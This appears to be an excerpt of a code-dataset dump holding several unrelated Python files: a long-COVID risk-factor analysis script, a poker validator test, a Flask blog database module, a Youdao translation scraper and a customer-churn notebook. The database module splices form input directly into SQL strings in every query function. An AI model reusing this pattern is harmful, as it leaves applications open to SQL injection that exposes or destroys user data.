organ_threshold=1, dump=True):\n print('Organ is defined by >=', organ_threshold)\n\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n pasc_flag = (df['organ-count'] >= organ_threshold).astype('int')\n print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n\n pasc_t2e = df['organ-min-t2e']\n # 1 pasc --> the earliest; 2 pasc --> 2nd earliest, et.c\n if organ_threshold >= 2:\n print('organ_threshold >=', organ_threshold, 't2e is defined as the ', organ_threshold,\n 'th earliest events time')\n df['organ-min-t2e'] = 180\n specific_organ_col = [x for x in df.columns if x.startswith('organ-flag@')]\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n norgan = rows['organ-count']\n if norgan >= organ_threshold:\n organ_flag_cols = list(rows[specific_organ_col][rows[specific_organ_col] > 0].index)\n organ_t2e_cols = [x.replace('organ-flag@', 'organ-t2e@') for x in organ_flag_cols]\n # t2e = rows[organ_t2e_cols].min()\n time_vec = sorted(rows[organ_t2e_cols])\n t2e = time_vec[min(len(time_vec) - 1, organ_threshold - 1)]\n else:\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'organ-min-t2e'] = t2e\n\n # support >= 2,3,4... by updating pasc-min-t2e definition.\n cox_data = df.loc[:, covs_columns]\n print('cox_data.shape before number filter:', cox_data.shape)\n cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & (cox_data.mean() < 1)]]\n print('cox_data.shape after number filter:', cox_data.shape)\n\n model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n if dump:\n utils.check_and_mkdir(args.out_dir + 'any_organ/')\n model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n args.out_dir + 'any_organ/any-at-least-{}-ORGAN-riskFactor-{}-{}-{}.csv'.format(organ_threshold,\n args.dataset,\n args.population,\n args.severity))\n model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n args.out_dir + 'any_organ/any-at-least-{}-ORGAN-modeSelection-{}-{}-{}.csv'.format(organ_threshold,\n args.dataset,\n args.population,\n args.severity))\n\n return model\n\n\ndef screen_any_pasc(args, df, df_pasc_info):\n print('In screen_any_pasc, args: ', args)\n print('random_seed: ', args.random_seed)\n model_dict = {}\n for i in range(1, 9):\n print('screen_any_pasc, In threshold:', i)\n model = risk_factor_of_any_pasc(args, df, df_pasc_info, pasc_threshold=i, dump=True)\n model_dict[i] = model\n\n return model_dict\n\n\ndef screen_any_organ(args, df, df_pasc_info):\n print('In screen_any_organ, args: ', args)\n print('random_seed: ', args.random_seed)\n model_dict = {}\n for i in range(1, 9):\n print('screen_any_pasc, In threshold:', i)\n model = risk_factor_of_any_organ(args, df, df_pasc_info, organ_threshold=i, dump=True)\n model_dict[i] = model\n\n return model_dict\n\n\ndef screen_all_organ(args, df, df_pasc_info, selected_organ_list, dump=True):\n print('In screen_all_organ, args: ', args)\n print('random_seed: ', args.random_seed)\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n # build flag, t2e for each organ\n print('Screening All Organ category')\n i = 0\n model_dict = {}\n for organ in tqdm(selected_organ_list, total=len(selected_organ_list)):\n i += 1\n print(i, 'screening:', organ)\n pasc_flag = df['organ-flag@' + organ]\n pasc_t2e = df['organ-t2e@' + organ]\n print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n\n cox_data = df.loc[:, covs_columns]\n print('cox_data.shape before number filter:', cox_data.shape)\n cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & (cox_data.mean() < 1)]]\n print('cox_data.shape after number filter:', cox_data.shape)\n\n model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n if dump:\n utils.check_and_mkdir(args.out_dir + 'every_organ/')\n model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n args.out_dir + 'every_organ/ORGAN-{}-riskFactor-{}-{}-{}.csv'.format(\n organ, args.dataset, args.population, args.severity))\n model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n args.out_dir + 'every_organ/ORGAN-{}-modeSelection-{}-{}-{}.csv'.format(\n organ, args.dataset, args.population, args.severity))\n print('Dump done', organ)\n\n model_dict[organ] = model\n\n return model_dict\n\n\ndef screen_all_pasc(args, df, df_pasc_info, selected_pasc_list, dump=True):\n print('In screen_all_pasc, args: ', args)\n print('random_seed: ', args.random_seed)\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n # build flag, t2e for each organ\n print('Screening All PASC category')\n i = 0\n model_dict = {}\n for pasc in tqdm(selected_pasc_list, total=len(selected_pasc_list)):\n i += 1\n print(i, 'screening:', pasc)\n pasc_flag = df['flag@' + pasc]\n pasc_t2e = df['dx-t2e@' + pasc]\n\n print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n\n cox_data = df.loc[:, covs_columns]\n print('cox_data.shape before number filter:', cox_data.shape)\n cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & (cox_data.mean() < 1)]]\n print('cox_data.shape after number filter:', cox_data.shape)\n\n model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n if dump:\n utils.check_and_mkdir(args.out_dir + 'every_pasc/')\n model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n args.out_dir + 'every_pasc/PASC-{}-riskFactor-{}-{}-{}.csv'.format(\n pasc.replace('/', '_'), args.dataset, args.population, args.severity))\n model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n args.out_dir + 'every_pasc/PASC-{}-modeSelection-{}-{}-{}.csv'.format(\n pasc.replace('/', '_'), args.dataset, args.population, args.severity))\n print('Dump done', pasc)\n\n model_dict[pasc] = model\n\n return model_dict\n\n\ndef combination_of_pasc():\n # specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n # pasc_name = {}\n # for index, row in df_pasc_info.iterrows():\n # pasc_name['flag@' + row['pasc']] = row['PASC Name Simple']\n #\n # pasc_data = df.loc[(df['covid'] == 1) & (df['pasc-count'] >= 1), specific_pasc_col].rename(columns=pasc_name)\n\n # # te = TransactionEncoder()\n # # te_ary = te.fit(pasc_data).transform(pasc_data)\n # freitem = apriori(pasc_data, min_support=0.001, use_colnames=True, low_memory=True)\n # freitem['length'] = freitem['itemsets'].apply(lambda x: len(x))\n # freitem['itemsets'] = freitem['itemsets'].apply(lambda x: '; '.join(list(x)))\n # freitem['Occurrence'] = freitem['support'] * len(pasc_data)\n # freitem['Crude Incidence'] = freitem['support'] * len(pasc_data) / len(df.loc[df['covid'] == 1, :])\n # freitem.to_csv(args.out_dir + 'frequent_pasc-covid-positive.csv')\n\n # pasc_data = df.loc[(df['covid'] == 0) & (df['pasc-count'] >= 1), specific_pasc_col].rename(columns=pasc_name)\n # # te = TransactionEncoder()\n # # te_ary = te.fit(pasc_data).transform(pasc_data)\n # freitem2 = apriori(pasc_data, min_support=0.0001, use_colnames=True, low_memory=True)\n # freitem2['length'] = freitem2['itemsets'].apply(lambda x: len(x))\n # freitem2['itemsets'] = freitem2['itemsets'].apply(lambda x: '; '.join(list(x)))\n # freitem2['Occurrence'] = freitem2['support'] * len(pasc_data)\n # freitem2['Crude Incidence'] = freitem2['support'] * len(pasc_data) / len(df.loc[df['covid'] == 0, :])\n # freitem2.to_csv(args.out_dir + 'frequent_pasc-covid-negative.csv')\n #\n # freitem_combined = pd.merge(freitem, freitem2, left_on='itemsets', right_on='itemsets', how='left')\n # freitem_combined.to_csv(args.out_dir + 'frequent_pasc-combined.csv')\n #\n # print(\"done!\")\n # print('Done! Total Time used:', time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n # sys.exit(0)\n pass\n\n\n# def plot_cumulative_incidence():\n\n\nif __name__ == '__main__':\n # python screen_risk_factors.py --dataset INSIGHT --encode elix 2>&1 | tee log/screen_anyPASC-risk_factors-insight-elix.txt\n # python screen_risk_factors.py --dataset OneFlorida --encode elix 2>&1 | tee log/screen_anyPASC-risk_factors-OneFlorida-elix.txt\n\n start_time = time.time()\n args = parse_args()\n\n np.random.seed(args.random_seed)\n random.seed(args.random_seed)\n\n print('args: ', args)\n print('random_seed: ', args.random_seed)\n\n # -Pre step1: select Covid Positive data and dump\n # read_all_and_dump_covid_positive(r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL.csv')\n # read_all_and_dump_covid_positive(r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all.csv')\n\n # -Pre step2: build Covid Positive data and dump for future use\n # df, df_pasc_info = build_incident_pasc_from_all_positive(args)\n\n # sys.exit(0)\n\n # Step 1: Load pre-processed data for screening. May dynamically fine tune feature\n print('Load data file:', args.processed_data_file)\n # args.processed_data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-ANYPASC.csv'\n df = pd.read_csv(args.processed_data_file, dtype={'patid': str, 'site': str, 'zip': str},\n parse_dates=['index date'])\n print('Load done, df.shape:', df.shape)\n print('Covid Positives:', (df['covid'] == 1).sum(), (df['covid'] == 1).mean())\n print('Covid Negative:', (df['covid'] == 0).sum(), (df['covid'] == 0).mean())\n\n # Step 2: Load pasc meta information\n df_pasc_info = pd.read_excel('output/causal_effects_specific_withMedication_v3.xlsx', sheet_name='diagnosis')\n selected_pasc_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'pasc']\n print('len(selected_pasc_list)', len(selected_pasc_list))\n print(selected_pasc_list)\n selected_organ_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'Organ Domain'].unique()\n print('len(selected_organ_list)', len(selected_organ_list))\n\n specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n pasc_name = {}\n for index, row in df_pasc_info.iterrows():\n pasc_name['flag@' + row['pasc']] = row['PASC Name Simple']\n\n pasc_data = df.loc[(df['covid'] == 1) & (df['pasc-count'] >= 1), specific_pasc_col].rename(columns=pasc_name)\n\n # Step 3: set Covid pos, neg, or all population\n if args.population == 'positive':\n print('Using Covid positive cohorts')\n df = df.loc[(df['covid'] == 1), :].copy()\n elif args.population == 'negative':\n print('Using Covid negative cohorts')\n df = df.loc[(df['covid'] == 0), :].copy()\n else:\n print('Using Both Covid Positive and Negative cohorts')\n\n print('Select population:', args.population, 'df.shape:', df.shape)\n\n # Step 4: set sub- population\n # focusing on: all, outpatient, inpatienticu (namely inpatient in a broad sense)\n # 'all', 'outpatient', 'inpatient', 'critical', 'ventilation' can add more later, just these 4 for brevity\n if args.severity == 'outpatient':\n print('Considering outpatient cohorts')\n df = df.loc[(df['hospitalized'] == 0) & (df['criticalcare'] == 0), :].copy()\n elif (args.severity == 'inpatienticu') or (args.severity == 'nonoutpatient'):\n print('Considering inpatient/hospitalized including icu cohorts, namely non-outpatient')\n df = df.loc[(df['hospitalized'] == 1) | (df['criticalcare'] == 1), :].copy()\n elif args.severity == 'inpatient':\n print('Considering inpatient/hospitalized cohorts but not ICU')\n df = df.loc[(df['hospitalized'] == 1) & (df['ventilation'] == 0) & (df['criticalcare'] == 0), :].copy()\n elif args.severity == 'icu':\n print('Considering ICU (hospitalized ventilation or critical care) cohorts')\n df = df.loc[(((df['hospitalized'] == 1) & (df['ventilation'] == 1)) | (df['criticalcare'] == 1)), :].copy()\n elif args.severity == 'ventilation':\n print('Considering (hospitalized) ventilation cohorts')\n df = df.loc[(df['hospitalized'] == 1) & (df['ventilation'] == 1), :].copy()\n else:\n print('Considering ALL cohorts')\n\n print('Select sub- cohorts:', args.severity, 'df.shape:', df.shape)\n\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n pasc_flag = (df['pasc-count'] >= 1).astype('int')\n pasc_t2e = df.loc[pasc_flag==1, 'pasc-min-t2e'] # this time 2 event can only be used for >= 1 pasc. If >= 2, how to define t2e?\n print('PASC pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'PASC neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n print('PASC t2e quantile:', np.quantile(pasc_t2e, [0.5, 0.25, 0.75]))\n\n severe_pasc_flag = df['pasc-severe-flag']\n severe_pasc_t2e = df.loc[df['pasc-severe-flag']==1, 'pasc-severe-min-t2e']\n print('Severe PASC pos:{} ({:.3%})'.format(severe_pasc_flag.sum(), severe_pasc_flag.sum()/pasc_flag.sum()))\n print('Severe PASC t2e quantile:', np.quantile(severe_pasc_t2e, [0.5, 0.25, 0.75]))\n\n moderate_pasc_flag = df['pasc-moderateonly-flag']\n moderate_pasc_t2e = df.loc[df['pasc-moderateonly-flag'] == 1, 'pasc-moderate-min-t2e']\n print('Moderate PASC pos:{} ({:.3%})'.format(moderate_pasc_flag.sum(), moderate_pasc_flag.sum() / pasc_flag.sum()))\n print('Moderate PASC t2e quantile:', np.quantile(moderate_pasc_flag, [0.5, 0.25, 0.75]))\n\n # plot cumulative incidence across age\n age_cols = ['20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years']\n col_name = ['20-39', '40-54', '55-64', '65-74', '75+']\n legend_title = \"Age group\"\n #\n age_cols = ['Female', 'Male']\n col_name = ['Female', 'Male']\n legend_title = \"Gender\"\n\n line_type = ['-', '-.', ':', '--', 'dotted', ]\n ajs = []\n for i, col in enumerate(age_cols):\n t2e = df.loc[df[col] == 1, 'pasc-min-t2e']\n flag = df.loc[df[col] == 1, 'pasc-flag']\n aj = AalenJohansenFitter(calculate_variance=True).fit(t2e, flag, event_of_interest=1, label=col_name[i])\n ajs.append(aj)\n\n f = plt.figure(figsize=(8, 5))\n ax = f.add_subplot(111)\n # ax = brokenaxes(ylims=((0, .7), (.7, 1)), hspace=.05)\n plt.axhline(y=0.5, color='0.85', linestyle='--')\n plt.axhline(y=0.6, color='0.85', linestyle='--')\n plt.axhline(y=0.7, color='0.85', linestyle='--')\n plt.axhline(y=0.8, color='0.85', linestyle='--')\n # ajf1.plot(ax=ax)\n for i, aj in enumerate(ajs):\n aj.plot(ax=ax, loc=slice(0., t2e.max()), linestyle=line_type[i]) # 0, 180\n\n # add_at_risk_counts(ajf1w, ajf0w, ax=ax)\n plt.xlim([0, 180])\n plt.ylim([0, 0.85])\n\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(True)\n ax.spines['left'].set_visible(True)\n legend = plt.legend(title=legend_title, fontsize=15, loc='upper left')\n legend.get_title().set_fontsize('15') # legend 'Title' fontsize\n # ax.grid(axis='y')\n\n plt.xticks(fontsize=12)\n plt.yticks(fontsize=12)\n ax.set_xlabel(\"Days\", fontsize=15)\n ax.set_ylabel(\"Cumulative Incidence\", fontsize=15)\n plt.tight_layout()\n\n utils.check_and_mkdir(args.fig_out_dir)\n plt.savefig(args.fig_out_dir + 'cumincidence_{}_{}.png'.format(legend_title, args.severity, ),\n bbox_inches='tight',\n dpi=600)\n plt.savefig(args.fig_out_dir + 'cumincidence_{}_{}.pdf'.format(legend_title, args.severity, ),\n bbox_inches='tight',\n transparent=True)\n\n plt.show()\n # plt.ylim([0, ajf0w.cumulative_density_.loc[180][0] * 3])\n\n # plt.title('title', fontsize=12)\n # plt.savefig(fig_outfile.replace('-km.png', '-cumIncidence.png'))\n # plt.close()\n\n # plot cumulative incidence across severity\n\n # ['anypasc', 'allpasc', 'anyorgan', 'allorgan']\n print(args.goal)\n # if args.goal == 'anypasc':\n # # screening risk factor of >= k PASC\n # screen_any_pasc(args, df, df_pasc_info)\n # elif args.goal == 'anyorgan':\n # screen_any_organ(args, df, df_pasc_info)\n # elif args.goal == 'allpasc':\n # screen_all_pasc(args, df, df_pasc_info, selected_pasc_list, dump=True)\n # elif args.goal == 'allorgan':\n # screen_all_organ(args, df, df_pasc_info, selected_organ_list, dump=True)\n\n print('Done! Total Time used:', time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n","sub_path":"prediction/risk_cumulative_incidence.py","file_name":"risk_cumulative_incidence.py","file_ext":"py","file_size_in_byte":44374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"450527681","text":"import unittest\nfrom poker.validators import PairValidator\nfrom poker.card import Card\n\nclass TestPairValidator(unittest.TestCase):\n\n def test_valid_rank_is_pair(self):\n cards = [\n Card(rank = \"5\", suite = \"hearts\"),\n Card(rank = \"7\", suite = \"spades\"),\n Card(rank = \"9\", suite = \"clubs\"),\n Card(rank = \"9\", suite = \"diamonds\"),\n Card(rank = \"King\", suite = \"hearts\")\n ]\n pair = PairValidator(cards = cards)\n\n self.assertEqual(\n pair.is_valid(),\n True \n )\n \n def test_valid_cards_making_a_pair(self):\n \n nine_diamonds = Card(rank = \"9\", suite = \"diamonds\")\n nine_clubs = Card(rank = \"9\", suite = \"clubs\")\n\n cards = [\n Card(rank = \"5\", suite = \"hearts\"),\n Card(rank = \"7\", suite = \"spades\"),\n nine_diamonds,\n nine_clubs,\n Card(rank = \"King\", suite = \"hearts\")\n ]\n cards.sort()\n pair = PairValidator(cards = cards)\n\n self.assertEqual(\n pair.valid_cards(),\n [nine_clubs,nine_diamonds]\n )\n","sub_path":"test/test_validators/test_pair_validator.py","file_name":"test_pair_validator.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"650563497","text":"import sqlite3\nfrom flask import g\n\nDATABASE = 'db/tru.db'\n\n\ndef connect_db():\n return sqlite3.connect('db/tru.db')\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = connect_db()\n return db\n\n\ndef init_db(app):\n with app.app_context():\n db = get_db()\n with app.open_resource('db/schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef insert_examples(app):\n with app.app_context():\n db = get_db()\n with app.open_resource('db/exampleEntries.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef get_posts():\n return query_db(\"SELECT * FROM post ORDER BY post.created_at DESC\")\n\n\ndef get_post(permalink):\n result = query_db(\"SELECT * FROM post WHERE post.permalink='\" + permalink + \"'\")[0]\n return result\n\n\ndef add_post(form, heroImage):\n # if a file is there save it into the db\n if heroImage.filename:\n result = query_db(\n \"INSERT INTO post(fileending, title, text, permalink, tags) VALUES('\" +\n heroImage.fileending + \"','\" + form['title'] + \"', '\" + form['text'] + \"', '\" +\n form['permalink'] + \"', '\" + form['tags'] + \"')\")\n # else just save the other form-data\n else:\n result = query_db(\n \"INSERT INTO post(title, text, permalink, tags) VALUES('\" + form['title'] + \"', '\" + form['text'] +\n \"', '\" + form['permalink'] + \"', '\" + form['tags'] + \"')\")\n g.db.commit()\n return result\n\n\ndef update_post(form, heroImage, permalink):\n # if a file is there save it into the db\n if heroImage.filename:\n result = query_db(\"UPDATE post SET fileending='\" + heroImage.fileending + \"',title='\" +\n form['title'] + \"',text='\" + form['text'] + \"',tags='\" + form['tags'] + \"',permalink='\" +\n form['permalink'] + \"' WHERE post.permalink='\" + permalink + \"'\")\n # else just save the other form-data\n else:\n result = query_db(\"UPDATE post SET title='\" + form['title'] + \"',text='\" + form['text'] +\n \"',tags='\" + form['tags'] + \"',permalink='\" + form['permalink'] + \"' WHERE post.permalink='\" + permalink + \"'\")\n g.db.commit()\n return result\n\n\ndef delete_post(permalink):\n result = query_db(\"DELETE FROM post WHERE post.permalink='\" + permalink + \"'\")\n g.db.commit()\n return result\n\n\ndef checkPermalink(permalink):\n return query_db(\"SELECT * FROM post WHERE post.permalink='\" + permalink + \"'\")\n\n\ndef query_db(query, args=(), one=False):\n try:\n cur = g.db.execute(query, args)\n rv = [dict((cur.description[idx][0], value)\n for idx, value in enumerate(row)) for row in cur.fetchall()]\n return (rv[0] if rv else None) if one else rv\n except:\n return {'error': 'query failed: ' + query}\n","sub_path":"db/db_accessor.py","file_name":"db_accessor.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"467109959","text":"'''\n# 获取网页信息\nimport urllib.request\ncontent=urllib.request.urlopen('http://www.fishc.com')\nurl=content.geturl()\nprint(\"the visit web is \",url,end=\" \")\ninfo=content.info()\nprint(\"\\n\",info)\nwith open(\"7月20号urlFile.txt\",'wb') as urlfile:\n urlfile.write(content.read())\nprint(content.read())\n\n# 网上下载一只猫的图片\ncat=urllib.request.urlopen('http://placekitten.com/200/300')\nprint('the visit web is ',cat,end=' ')\nprint(\"\\n\",\"the url is \",cat.geturl())\nprint(cat.info())\nwith open(\"7月20号cat.jpg\",'wb') as catSave:\n catSave.write(cat.read())\nprint(cat.read())\n'''\n# 利用有道词典进行翻译\n# 利用Request 中的header 隐藏自己是python 代码\nimport urllib.request\nimport urllib.parse # 转换data 的模块 \nimport time\nwhile True:\n content=input('请输入你要翻译的内容: ')\n if(content=='stop'):\n break\n url='http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'\n # 从network中获得的url 是 url='http://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule'\n # 但使用这个会出现error code 错误 所以去掉 _o\n data={}\n data['i']= content\n data['from']='AUTO'\n data['to']='AUTO'\n data['smartresult']='dict'\n data['client']='fanyideskweb'\n data['salt']='15635901740962'\n data['sign']='a71db6b3543a462d4d7c74eb999abb92'\n data['ts']='1563590174096'\n data['bv']='553e64422a39a8b1187e4cd4e341c092'\n data['doctype']='json'\n data['version']='2.1'\n data['keyfrom']='fanyi.web'\n data['action']='FY_BY_REALTlME'\n # data 是我们向网页提交需求的内容\n# 方法一:\n# head={}\n# head['User-Agent']='Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5959.400 SLBrowser/10.0.3544.400'\n# data=urllib.parse.urlencode(data).encode('utf-8')\n# req=urllib.request.Request(url,data,head)\n# 方法二:\n data=urllib.parse.urlencode(data).encode('utf-8')\n req=urllib.request.Request(url,data)\n req.add_header('User-Agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5959.400 SLBrowser/10.0.3544.400')\n transation=urllib.request.urlopen(req)\n print(transation.read().decode('utf-8'))\n time.sleep(5)\n# 通过以下方式获得编码方式\n# import chardet\n# chardet.detect(transation.read())['encoding']\n","sub_path":"7月20号.py","file_name":"7月20号.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"580134272","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Summary/Notes\n# \n# ### When you have finished your data visualization exploration, return to this markdown cell and fill it out in preparation for your meeting with the analytics manager, Victor.\n# \n# **Hypothesis 1 findings:** \n# \n# **Hypothesis 2 findings:**\n# \n# **Hypothesis 3 findings:**\n# \n# \n\n# # How to Complete This Notebook\n# \n# This notebook has a skeleton structure to guide your exploration and keep you on track. More details about each task can be found in the project sidebar. Be sure to read the sidebar instructions for each step before writing your code. \n\n# # 1. IMPORT & EXPLORE THE DATA\n# \n# ## 1A. Import Packages & Set Style\n\n# In[2]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nsns.set()\n\n\n# ## 1B. Import the Data\n# The datsets are stored in the following files:\n# * \"customers.csv\"\n# * \"churn.csv\"\n# \n# These files are in the same folder you are currently working in. \n\n# In[3]:\n\n\ncustomers = pd.read_csv(\"customers.csv\")\n\n\n# In[4]:\n\n\nchurn = pd.read_csv(\"churn.csv\")\n\n\n# ## 1C. Explore Your Data & Identify Structure\n# Add as many code cells as you need to thoroughly explore both DataFrames here.\n\n# In[5]:\n\n\nchurn.info()\nchurn.head(15)\n\n\n# In[6]:\n\n\ncustomers.info()\ncustomers.head(15)\n\n\n# # 2. VISUALIZE THE CUSTOMER DATA\n# \n# ## 2A. Identify Columns Connected to Churn\n\n# In[7]:\n\n\ncustomer_subset = customers[[\"customer_id\", \"age\", \"gender\", \"number_of_referrals\", \"offer\", \"monthly_charge\", \"total_charges\", \"contract\", \"payment_method\", \"under_30\", \"senior_citizen\", \"married\"]]\n\n\n# ## 2B. Visualize the Data\n# \n# ### Plot 1:\n\n# In[8]:\n\n\ngender_dict = dict(customer_subset.gender.value_counts())\nx_labels = gender_dict.keys()\ny_labels = gender_dict.values()\nplt.bar(x_labels, y_labels)\nplt.xlabel(\"Gender\")\nplt.ylabel(\"Frequency\")\nplt.title(\"Gender Breakdown in the Customer CSV\")\n\n\n# **Plot description:** \n# The ratio between male and females is almost equal. There are 3554 males and 3488 females\n\n# ### Plot 2:\n\n# In[9]:\n\n\nage_dict = dict(customer_subset.age.value_counts())\nprint(age_dict)\nprint(min(age_dict.values()))\nprint(min(age_dict.keys()))\nprint(max(age_dict.keys()))\nprint(max(age_dict.values()))\nx_labels = age_dict.keys()\ny_labels = age_dict.values()\nplt.bar(x_labels, y_labels)\nplt.xlabel(\"Ages\")\nplt.ylabel(\"Frequency\")\nplt.title(\"Age Breakdown in the Customer CSV\")\n\n\n# **Plot description:** The ages included in the CSV are widely dispersed, with the most popular age being 42 and the least popular age being 72. The youngest age in the CSV is 19, and the oldest is 80.\n\n# ### adding a few more plots...\n\n# In[25]:\n\n\nsns.boxplot(\n x=\"offer\",\n y=\"total_charges\",\n hue=\"offer\",\n data= customer_subset\n)\n\n\n# ### boxplot\n# \n# Offer E is the cheapest, with total charges around $1500$. Offer A is the most expensive, with total charges reaching past $8000$!\n\n# In[27]:\n\n\nsns.boxplot(\n x=\"offer\",\n y=\"total_charges\",\n hue=\"gender\",\n data= customer_subset\n)\n\n\n# ### grouped boxplot\n# This boxplot compares total charges vs. the available offers, and the boxplot is grouped by gender. Overall, it seems like men and women pay very comparable rates. In Offer E, B, and A, females pay a bit more, and in C males pay more than females in total charges. In offer D, the results are nearly exact.\n\n# In[31]:\n\n\nsns.displot(\n customer_subset, x=\"monthly_charge\", col=\"offer\", row=\"gender\",\n binwidth=3, height=3, facet_kws=dict(margin_titles=True),\n)\n\n\n# ### Distplot\n# This plot provides a more granular overview of what males and females are paying on a monthly basis. The columns are grouped by Offers, and the rows are grouped by Gender. It is interesting that, at each offer level, both males and females tend to pay the lowest monthly charge.\n\n# 